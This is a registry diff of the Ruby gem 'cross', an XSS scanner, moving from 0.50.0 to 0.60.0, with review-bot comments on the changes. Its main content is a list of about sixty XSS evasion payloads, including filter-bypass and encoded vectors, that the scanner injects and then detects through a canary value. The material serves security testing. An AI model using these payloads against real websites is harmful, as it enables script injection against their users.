cross 0.50.0 → 0.60.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
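--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
  ---
  SHA1:
- metadata.gz: 72b79605b86769c7845420cf772fe7e5ca4251c9
- data.tar.gz: de0ec4524597cd129cd1957bdca99587b743f0fa
+ metadata.gz: 4f1bec8b1ce4f2e496fe86f5d966efb87696b4e9
+ data.tar.gz: 8953c2f3a406c7a3cedbeb6f09395e2ddd7e5c11
  SHA512:
- metadata.gz: 4164f2710605496b67199f45f03f4b680c3926909f949b825f16b6a799534afca8c56496275c1d5f5e9a80139268ca0e90e2d189367981c14c64920732441c29
- data.tar.gz: 8cec8b9fb129209cdf5266b5e046bff9265f06aec82c68dc00c8bb0727a259ca2715bfbfd94790d62356d160ed347efa9a3ee44ff30aeb0f13a2efce9726ec36
+ metadata.gz: acb82a8dbe95bf8c952f2537d03642ec4f6d059202914d93f8509605beb208bf6088fdca447d84934f5d61446b7ad4e8f9b3442ed213091685abade5879c006e
+ data.tar.gz: a159b734f9bb303170e2e922c936c4c89abfe83524f58f2392bee7e0b2e679813c8371d5c01edd46faa615b39e26f4e94cb7b020aa73e0eeba7ac0d1954b8cb6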
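--- a/data/lib/cross/engine.rb
+++ b/data/lib/cross/engine.rb
@@ -75,8 +75,8 @@ module Cross
 
  scripts = page.search("//script")
  scripts.each do |sc|
- $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert('cross canary')")
- return true if sc.children.text.include?("alert('cross canary')")
+ $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
+ return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
  end
 
  return false if options[:oneshot]
@@ -115,8 +115,6 @@ module Cross
  ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
  ff.value = pattern if ff.name==options[:parameter_to_tamper]
 
-
- # promo=Promo1&codice=&nome=&cognome=&indirizzo=%3Cscript%3Ealert%28%27cross+canary%27%29%3C%2Fscript%3E&comune=&CAP=&provincia=&num1=&num2=&mail=&codfisc=&fase=1
  end
  end
 
@@ -126,7 +124,13 @@ module Cross
  $logger.err "Page is empty" if pp.body.empty?
  scripts = pp.search("//script")
  scripts.each do |sc|
- return true if sc.children.text.include?("alert('cross canary')")
+ return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
+ end
+
+ # This is for input html field javascript event evasion
+ inputs = pp.search("//input")
+ inputs.each do |input|
+ return true if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
  end
  end
  return false if options[:oneshot]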
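Review bot: In the third hunk (`@@ -126,7 +124,13 @@`) the new `//input` loop only inspects the `onmouseover` attribute, so a canary that the page reflects into any other event-handler attribute or element that `Cross::Attack::XSS.each` emits (`onerror`, `onfocus`, `onblur` on `img`, `body`, `video`, …) is never reported and the run ends as a false negative; checking every `on*` attribute on every element, e.g. `return true if pp.search("//@*[starts-with(name(),'on')]").any? { |a| a.value.include?(marker) }`, would make the detector cover the payloads the scanner actually sends. `! input['onmouseover'].nil? && input['onmouseover'].include?(...)` also reads more simply as `input['onmouseover'].to_s.include?(...)`. The marker string `"alert(#{Cross::Attack::XSS::CANARY})"` is now interpolated in three places across the first and third hunks; building it once (`marker = "alert(#{Cross::Attack::XSS::CANARY})"`, or a constant defined next to `CANARY`) keeps the detector and the payload list in step. The stacked modifier in the first hunk, `$logger.log(page.body) if @options[:debug] if sc.children.text.include?(...)`, is legal but easy to misread; `if @options[:debug] && sc.children.text.include?(...)` says the same thing. The enclosing methods of all three hunks start and end outside the hunks.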
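--- a/data/lib/cross/version.rb
+++ b/data/lib/cross/version.rb
@@ -1,3 +1,3 @@
  module Cross
- VERSION = "0.50.0"
+ VERSION = "0.60.0"
  end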
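--- a/data/lib/cross/xss.rb
+++ b/data/lib/cross/xss.rb
@@ -2,69 +2,71 @@ module Cross
  module Attack
  class XSS
 
+ CANARY = 666
+
  def self.each
 
  evasions = [
- "<script>alert('cross canary')</script>",
- "<script>alert('cross canary');</script>",
- "/--><script>alert('cross canary')</script>",
- "/--><script>alert('cross canary');</script>",
- "/--></ScRiPt><ScRiPt>alert('cross canary')</ScRiPt>",
- "/--></ScRiPt><ScRiPt>alert('cross canary');</ScRiPt>",
- "//;-->alert('cross canary')",
- "//;-->alert('cross canary');",
- "\"//;\nalert('cross canary')",
- "\"//;\nalert('cross canary');",
- " onmouseover=alert('1');",
+ "a onmouseover=alert(#{Cross::Attack::XSS::CANARY})",
+ "<script>alert(#{Cross::Attack::XSS::CANARY})</script>",
+ "<script>alert(#{Cross::Attack::XSS::CANARY});</script>",
+ "/--><script>alert(#{Cross::Attack::XSS::CANARY})</script>",
+ "/--><script>alert(#{Cross::Attack::XSS::CANARY});</script>",
+ "/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY})</ScRiPt>",
+ "/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY});</ScRiPt>",
+ "//;-->alert(#{Cross::Attack::XSS::CANARY})",
+ "//;-->alert(#{Cross::Attack::XSS::CANARY});",
+ "\"//;\nalert(#{Cross::Attack::XSS::CANARY})",
+ "\"//;\nalert(#{Cross::Attack::XSS::CANARY});",
  # more exotic vectors (antisnatchor's collection)
- "<script/anyjunk>alert('cross canary')</script>",
- "<<script>alert('cross canary');//<</script>",
- "<img onerror=alert('cross canary') src=a>",
- "<xml onreadystatechange=alert('cross canary')>",
- "<style onreadystatechange=alert('cross canary')>",
- "<iframe onreadystatechange=alert('cross canary')>",
- "<object onerror=alert('cross canary')>",
- "<object type=image src=/images/live.gif onreadystatechange=alert('cross canary')></object>",
- "<img type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
- "<input type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
- "<isindex type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
- "<script onreadystatechange=alert('cross canary')>",
- "<bgsound onpropertychange=alert('cross canary')>",
- "<body onbeforeactivate=alert('cross canary')>",
- "<body onfocusin=alert('cross canary')>",
- "<input autofocus onfocus=alert('cross canary')>",
- "<input onblur=alert('cross canary') autofocus><input autofocus>",
- "<body onscroll=alert('cross canary')><br><br>...<br><input autofocus>",
- "</a onmousemove=alert('cross canary')>",
- "<video src=1 onerror=alert('cross canary')>",
- "<audio src=1 onerror=alert('cross canary')>",
- "<object data=javascript:alert('cross canary')>",
- "<iframe src=javascript:alert('cross canary')>",
- "<embed src=javascript:alert('cross canary')>",
- "<form id=test /><button form=test formaction=javascript:alert('cross canary')>",
- "<event-source src=javascript:alert('cross canary')>",
- "<x style=behavior:url(#default#time2) onbegin=alert('cross canary')>",
- "<x style=x:expression(alert('cross canary'))>",
- "<x onclick=alert('cross canary') src=a>Click here</x>",
- "<img onerror=\"alert('cross canary')\"src=a>",
- "<img onerror=`alert('cross canary')`src=a>",
- "<img/onerror=\"alert('cross canary')\"src=a>",
- "<img onerror=a&#x6c;ert('cross canary') src=a>",
- "<img onerror=a&#x06c;ert('cross canary') src=a>",
- "<img onerror=a&#x006c;ert('cross canary') src=a>",
- "<img onerror=a&#x0006c;ert('cross canary') src=a>",
- "<img onerror=a&#108;ert('cross canary') src=a>",
- "<img onerror=a&#0108;ert('cross canary') src=a>",
- "<img onerror=a&#0108;ert('cross canary') src=a>",
- "<img onerror=a&#108ert('cross canary') src=a>",
- "<img onerror=a&#0108ert('cross canary') src=a>",
- "<script>function::['alert']('cross canary')</script>",
- "<svg><script>//&#x0A;alert('cross canary')</script>", #Chrome <= 18 XssAuditor bypass
- "<script>/*///*/alert('cross canary');</script>", #Chrome <= 20 XssAuditor bypass
- "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('cross canary'))>", #.NET RequestValidator bypass
- "+ADw-script+AD4-alert('cross canary')+ADw-/script+AD4-", # UTF-7
- "},alert('cross canary'),function x(){//", # DOM breaker
- "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert('cross canary')\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
+ "<script/anyjunk>alert(#{Cross::Attack::XSS::CANARY})</script>",
+ "<<script>alert(#{Cross::Attack::XSS::CANARY});//<</script>",
+ "<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<xml onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<style onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<iframe onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<object onerror=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<object type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})></object>",
+ "<img type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<input type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<isindex type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<script onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<bgsound onpropertychange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<body onbeforeactivate=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<body onfocusin=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<input autofocus onfocus=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<input onblur=alert(#{Cross::Attack::XSS::CANARY}) autofocus><input autofocus>",
+ "<body onscroll=alert(#{Cross::Attack::XSS::CANARY})><br><br>...<br><input autofocus>",
+ "</a onmousemove=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<video src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<audio src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<object data=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
+ "<iframe src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
+ "<embed src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
+ "<form id=test /><button form=test formaction=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
+ "<event-source src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
+ "<x style=behavior:url(#default#time2) onbegin=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<x style=x:expression(alert(#{Cross::Attack::XSS::CANARY}))>",
+ "<x onclick=alert(#{Cross::Attack::XSS::CANARY}) src=a>Click here</x>",
+ "<img onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
+ "<img onerror=`alert(#{Cross::Attack::XSS::CANARY})`src=a>",
+ "<img/onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
+ "<img onerror=a&#x6c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#x06c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#x006c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#x0006c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#0108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#0108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#108ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#0108ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<script>function::['alert'](#{Cross::Attack::XSS::CANARY})</script>",
+ "<svg><script>//&#x0A;alert(#{Cross::Attack::XSS::CANARY})</script>", #Chrome <= 18 XssAuditor bypass
+ "<script>/*///*/alert(#{Cross::Attack::XSS::CANARY});</script>", #Chrome <= 20 XssAuditor bypass
+ "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(#{Cross::Attack::XSS::CANARY}))>", #.NET RequestValidator bypass
+ "+ADw-script+AD4-alert(#{Cross::Attack::XSS::CANARY})+ADw-/script+AD4-", # UTF-7
+ "},alert(#{Cross::Attack::XSS::CANARY}),function x(){//", # DOM breaker
+ "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(#{Cross::Attack::XSS::CANARY})\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
  ]
  evasions.each do |pattern|
  yield pattern if block_given?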
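Review bot: `CANARY = 666` on the new side is a fixed, predictable value, so the detector in `engine.rb` will report a page that already contains the literal text `alert(666)` as vulnerable regardless of what was injected; deriving the value once at load time, e.g. `CANARY = rand(100_000..999_999)`, keeps the marker unique per run while every payload and every check still reads the same constant. Within `class XSS` the fully-qualified `#{Cross::Attack::XSS::CANARY}` on each entry can simply be `#{CANARY}`, which shortens some sixty lines without changing what they produce. Because the `evasions` literal sits inside `self.each`, all of these interpolated strings are rebuilt on every call; hoisting the list to a frozen class-level constant (`EVASIONS = [...].freeze`) and iterating that would allocate once, and would also make the duplicate `a&#0108;ert` entry on new lines 59 and 60 easier to spot and drop. The method `self.each` continues past the end of the hunk.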
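--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
  --- !ruby/object:Gem::Specification
  name: cross
  version: !ruby/object:Gem::Version
- version: 0.50.0
+ version: 0.60.0
  platform: ruby
  authors:
  - Paolo Perego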